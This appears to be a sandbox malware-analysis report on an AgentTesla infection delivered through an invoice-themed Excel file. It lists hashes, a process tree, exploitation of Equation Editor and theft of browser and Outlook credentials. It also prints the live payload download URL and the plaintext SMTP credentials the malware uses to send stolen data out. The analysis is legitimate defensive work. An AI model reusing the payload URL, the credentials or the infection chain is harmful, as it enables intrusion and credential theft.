Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/09/2024, 07:02 UTC

General

  • Target

    Factura.xlsx

  • Size

    3.9MB

  • MD5

    5ffc2a72ff05e1f486e4aa0142b89a23

  • SHA1

    1d7428dd31e095b0aa43a61c962e7d42587c3f0c

  • SHA256

    0f626eca4a80a70619bded3da7db0cbac8de8effb65482cdf05962ff789155be

  • SHA512

    3b9753133f33901cc5fe4cc9e13ddb860b6a4cbae572ba4aad0149589c4b162caa9352dc57831d9c532367e5f978e22de34612566990fd0e83aaba4797cec7d4

  • SSDEEP

    98304:fxCNiZcsxN2HwHTiOsR1PWdVUnugvD50Dm:ZC8ZcsiOPdEugvDV

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.solucionesmexico.mx
  • Port:
    587
  • Username:
    security@solucionesmexico.mx
  • Password:
    Qdk,[nKrmI0j
  • Email To:
    security@solucionesmexico.mx

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Factura.xlsx
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1748
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Users\Admin\AppData\Local\Temp\givesa.exe
      C:\Users\Admin\AppData\Local\Temp\givesa.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        C:\Users\Admin\AppData\Local\Temp\givesa.exe
        3⤵
        • Accesses Microsoft Outlook profiles
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:2056

Network

  • US
    DNS
    sscc.com.pk
    EQNEDT32.EXE
    Remote address:
    8.8.8.8:53
    Request
    sscc.com.pk
    IN A
    Response
    sscc.com.pk
    IN A
    65.108.31.28
  • US
    DNS
    sscc.com.pk
    EQNEDT32.EXE
    Remote address:
    8.8.8.8:53
    Request
    sscc.com.pk
    IN A
  • FI
    GET
    http://sscc.com.pk/wp-content/upgrade/oscn/farm.exe
    EQNEDT32.EXE
    Remote address:
    65.108.31.28:80
    Request
    GET /wp-content/upgrade/oscn/farm.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: sscc.com.pk
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 07:00:35 GMT
    Server: Apache/2
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Thu, 19 Sep 2024 04:44:04 GMT
    ETag: "10d77b-6227192742d00"
    Accept-Ranges: bytes
    Content-Length: 1103739
    Keep-Alive: timeout=2, max=100
    Content-Type: application/x-msdownload
  • 65.108.31.28:80
    URL: http://sscc.com.pk/wp-content/upgrade/oscn/farm.exe
    Protocol: http
    Process: EQNEDT32.EXE
    Bytes sent: 32.9kB
    Bytes received: 1.1MB
    Packets sent: 594
    Packets received: 817

    HTTP Request

    GET http://sscc.com.pk/wp-content/upgrade/oscn/farm.exe

    HTTP Response

    200
  • 8.8.8.8:53
    Domain: sscc.com.pk
    Protocol: dns
    Process: EQNEDT32.EXE
    Bytes sent: 114 B
    Bytes received: 73 B
    Packets sent: 2
    Packets received: 1

    DNS Request

    sscc.com.pk

    DNS Request

    sscc.com.pk

    DNS Response

    65.108.31.28

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\givesa.exe

    Filesize

    1.1MB

    MD5

    5e82584ed7739e18b4137b5e05d5167f

    SHA1

    308388caa070f0a7e2791c5d348d52fe1f9b4070

    SHA256

    91100ceceed13fa2497c0d3e8e186506f2a6566d6b8b651eec8437c67622893d

    SHA512

    bd7b61d5164c063814e7d039f415f81648fb6e6fcc6fb8f0f8bcfc6aecc9caaa1899f2e09613ca27f47aec6c2fc122a28cf9ad72a36a547168cdc0b164888a0b

  • memory/1748-1-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

  • memory/1748-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1748-22-0x0000000071FED000-0x0000000071FF8000-memory.dmp

    Filesize

    44KB

  • memory/2056-13-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

  • memory/2056-21-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

  • memory/2056-18-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB

  • memory/2056-14-0x0000000000090000-0x00000000000C0000-memory.dmp

    Filesize

    192KB
